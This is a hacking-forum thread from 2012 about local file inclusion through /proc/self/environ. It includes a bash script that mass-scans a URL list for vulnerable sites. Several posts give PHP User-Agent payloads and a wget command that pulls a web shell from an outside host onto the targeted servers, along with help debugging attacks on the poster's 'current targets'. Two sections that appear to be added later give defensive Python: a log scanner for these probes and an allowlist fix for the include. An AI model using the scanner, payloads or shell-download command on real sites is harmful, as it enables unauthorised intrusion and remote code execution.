EvilZone
Hacking and Security => neusbeer, January 27, 2012, 09:19:35 AM
-
There's a 'new' LFI attack being used a lot at the moment.
Read this article: http://www.devilscafe.in/2012/01/lfi-and-shell-upload-with-tamper-data.html
It's an LFI with the standard /etc/passwd inclusion, and right after that a check for /proc/self/environ.
I never heard of this 'link'.. what is it? I know it's from Linux.. is it the running account info on the server?
Anyways, it allows the use of a shell ;-)
I made a script to check the exploit on a URL list.
Input a list with /etc/passwd in the URL (example list: http://dl.dropbox.com/u/4378489/Forums/evilzone/links1.txt) and it results in a logfile with /proc/self/environ possible.
(after that, tamper the user-agent to get your shell up there :-))
#!/bin/bash
# Pass 1: request every URL in the list (each already pointing at /etc/passwd)
# and treat a response that mentions "root" as a successful inclusion.
while read -r url; do
    test=$(curl -s "$url" | grep -i "root")
    if [ -z "$test" ]; then
        echo "No LFI in $url"
    else
        echo "LFI found in $url"
        echo "$url" >> output.log
    fi
done < "$1"

# Pass 2: swap /etc/passwd for /proc/self/environ in each logged URL and look
# for DOCUMENT_ROOT, which the process environment exposes when the include works.
sed 's/\/etc\/passwd/\/proc\/self\/environ/g' output.log | while read -r url1; do
    test=$(curl -s "$url1" | grep -i "document_root")
    if [ -z "$test" ]; then
        echo "No /proc/self/environ in $url1"
    else
        echo "/proc/self/environ found in $url1"
        echo "$url1" >> final_list.log
    fi
done
-
saw this the other day, very interesting!
I've been using TamperData for years now, brilliant tool
-
I don't.. I use mostly Fiddler2 (gives me mostly the same results)..
Testing that TamperData script from Firefox now..
looks handy..
-
/proc/self/environ contains the environment variables of the current process.
In Apache (I don't know if it works on other servers too) it contains several fields of information, one of them being the User-Agent of the client. If you can include /proc/self/environ and you set your User-Agent to something like "<?php passthru($_GET['s']); ?>", that PHP code will be executed.
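Seen from the server side, the mechanism just described leaves two traces in the access log: an include parameter that resolves to /etc/passwd or /proc/self/environ, and a User-Agent that carries a PHP open tag (the same header value that /proc/self/environ would hand to the include). The following added example is not code from this thread or from the linked article; it is a small Python scanner over constructed Apache combined-format log lines. The IP addresses, timestamps and the parameter name `page` are made up for the example.

```python
import re
from typing import Optional
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample lines in Apache "combined" log format (not taken from the page).
# Lines 2-4 model the sequence the thread describes: an include parameter walked back
# to /etc/passwd, then to /proc/self/environ, with PHP code in the User-Agent.
SAMPLE_LOG = """\
203.0.113.5 - - [27/Jan/2012:09:19:35 +0000] "GET /index.php?page=about HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [27/Jan/2012:09:20:01 +0000] "GET /index.php?page=../../../../etc/passwd HTTP/1.1" 200 1843 "-" "Mozilla/5.0"
203.0.113.7 - - [27/Jan/2012:09:20:09 +0000] "GET /index.php?page=../../../../proc/self/environ HTTP/1.1" 200 2210 "-" "<?php passthru($_GET['cmd']); ?>"
203.0.113.7 - - [27/Jan/2012:09:20:15 +0000] "GET /index.php?page=..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron&cmd=id HTTP/1.1" 200 2290 "-" "<? passthru($_GET['cmd']); ?>"
198.51.100.2 - - [27/Jan/2012:09:21:00 +0000] "GET /images/logo.png HTTP/1.1" 200 9031 "http://example.test/" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# The two files the thread names as the usual LFI probes.
SENSITIVE_PATHS = ("/etc/passwd", "/proc/self/environ")
# Any PHP open tag ("<?php", "<?", "<?=") in a header the server will write into its
# environment or logs; "<?xml" is excluded so an XML prolog is not flagged.
PHP_TAG_RE = re.compile(r"<\?(?!xml)", re.IGNORECASE)


def suspicious_param_value(value: str) -> bool:
    """True if a query value contains traversal or names a sensitive file.
    parse_qs already decoded one layer of %XX; unquote again to catch double encoding."""
    decoded = unquote(value).lower()
    return ".." in decoded or any(p in decoded for p in SENSITIVE_PATHS)


def analyse_line(line: str) -> Optional[dict]:
    """Return a finding for one log line, or None if it is benign or does not parse."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    reasons = []
    query = urlsplit(m.group("target")).query
    for name, values in parse_qs(query).items():
        if any(suspicious_param_value(v) for v in values):
            reasons.append(f"sensitive_path_in_param:{name}")
    if PHP_TAG_RE.search(m.group("ua")):
        reasons.append("php_tag_in_user_agent")
    if not reasons:
        return None
    return {"ip": m.group("ip"), "timestamp": m.group("ts"),
            "target": m.group("target"), "reasons": reasons}


def scan_log(text: str) -> list:
    """Run analyse_line over every line and keep the findings, in log order."""
    return [f for f in (analyse_line(l) for l in text.splitlines()) if f]


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding["ip"], finding["timestamp"], ", ".join(finding["reasons"]))
```

The two reasons are kept separate on purpose: a traversal hit alone is a probe, while a traversal hit on /proc/self/environ together with a PHP tag in the User-Agent is the full pattern from the linked article and is the line worth alerting on.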
-
yes.. that's the idea! :D
only I'm struggling with the codes.. :P
In the way you describe I get an error about wrong char use in the T_STRING
the ' won't work... at least at my current targets..
so <?exec('wget http://xx.no-ip.org/Shells/SyRiAn_Sh3ll_V7.txt -O shell.php');?>
will return an error that the ' isn't accepted.
when I try with passthru,
<? passthru($_GET['cmd']); ?> in the USER AGENT and add ?cmd=wget http://xx.no-ip.org/Shells/SyRiAn_Sh3Lll_V7.txt -O shell.php
I get an error that I'm not giving a URL.
(spaces in the URL, I think?)
-
> yes.. that's the idea! :D
> only I'm struggling with the codes.. :P
> In the way you describe I get an error about wrong char use in the T_STRING
> the ' won't work... at least at my current targets..
> so <?exec('wget http://xx.no-ip.org/Shells/SyRiAn_Sh3ll_V7.txt -O shell.php');?>
> will return an error that the ' isn't accepted.
> when I try with passthru,
> <? passthru($_GET['cmd']); ?> in the USER AGENT and add ?cmd=wget http://xx.no-ip.org/Shells/SyRiAn_Sh3Lll_V7.txt -O shell.php
> I get an error that I'm not giving a URL.
> (spaces in the URL, I think?)
I always use <?php ?>, might be the problem. Dunno.
Anyway, on another note. This is old. Old. Old. Old. We have posts about this back from 2006-7. Just sayin.
-
Aw man, where are the archives when you need them. Somebody posted a guide on something very similar to this (it was named something like LFI + log poisoning).
-
> Aw man, where are the archives when you need them. Somebody posted a guide on something very similar to this (it was named something like LFI + log poisoning).
It is the same concept. You "poison" the logs with a user-agent containing PHP code and then execute it with an LFI. But you need read rights to those logs.
-
log poisoning is something different..
hmm and I still can't get the damn thing to work :P
-
> I always use <?php ?>, might be the problem. Dunno.
> Anyway, on another note. This is old. Old. Old. Old. We have posts about this back from 2006-7. Just sayin.
(sorry double post, but just saw this post)
maybe old.. but I just found out.. ;)
and why isn't it fixed by now?
I often check the SpiderLabs blog for new (or in this case old) exploits/hack tries on their honeypots and servers etc.. and some other contributors on this.
It often gives me a lot of new info on what is being exploited at this moment, and even the requests etc.
oh, and a PHP quote has to end with ?> .. always?
-
> (sorry double post, but just saw this post)
> maybe old.. but I just found out.. ;)
> and why isn't it fixed by now?
> I often check the SpiderLabs blog for new (or in this case old) exploits/hack tries on their honeypots and servers etc.. and some other contributors on this.
> It often gives me a lot of new info on what is being exploited at this moment, and even the requests etc.
The /proc/self/environ is not an exploit or bug in itself. It is still just an LFI problem. Therefore it is not fixed. Fix the LFI vuln and you fix the /proc/self/environ problem.
> oh, and a PHP quote has to end with ?> .. always?
PHP tags are always <?php /* do shit here */ ?> or <? /* Do shit here */ ?> depending on version and usage etc.
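The point that fixing the LFI itself removes the /proc/self/environ problem can be shown directly. The following added example is mine, not from the thread, and is written in Python rather than PHP so it can be run as-is: it puts the unchecked include($_GET['page']) pattern beside a hardened resolver that accepts only names from an allowlist and then confirms the resolved file still lies under the template directory. The directory /srv/example-app/pages and the page names are hypothetical.

```python
import os
from typing import Optional

# Hypothetical template directory and the only page names index.php may include.
BASE_DIR = "/srv/example-app/pages"
ALLOWED_PAGES = {"home", "about", "contact"}


def vulnerable_resolve(page: str, base_dir: str = BASE_DIR) -> str:
    """The unchecked pattern, i.e. include($_GET['page']) with no validation.
    Whatever the client supplies is treated as a filesystem path, so both
    '../../../../proc/self/environ' and an absolute '/proc/self/environ' leave base_dir."""
    return os.path.normpath(os.path.join(base_dir, page))


def is_within(base_dir: str, path: str) -> bool:
    """True if path, after '..' and symlink resolution, lies under base_dir."""
    base = os.path.realpath(base_dir)
    target = os.path.realpath(path)
    return os.path.commonpath([base, target]) == base


def safe_resolve(page: str, base_dir: str = BASE_DIR) -> Optional[str]:
    """The hardened form: treat the parameter as a name, never as a path.
    1. Only allowlisted names are accepted, so traversal sequences, absolute paths
       and null bytes never reach the filesystem layer at all.
    2. As defence in depth, confirm the chosen file still resolves under base_dir
       (covers a mistaken allowlist entry or a template that is a symlink)."""
    if page not in ALLOWED_PAGES:
        return None
    candidate = os.path.join(base_dir, page + ".php")
    if not is_within(base_dir, candidate):
        return None
    return os.path.realpath(candidate)


if __name__ == "__main__":
    for value in ("home", "../../../../proc/self/environ", "/etc/passwd"):
        print(f"{value!r}: unchecked -> {vulnerable_resolve(value)}, "
              f"hardened -> {safe_resolve(value)}")
```

With the allowlist in place the second layer rarely fires, but keeping it means a later edit that relaxes the allowlist into a "sanitised path" does not silently reopen the include.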
-
ok... I've got the wrong examples then.. (about ending with ?>)
ty..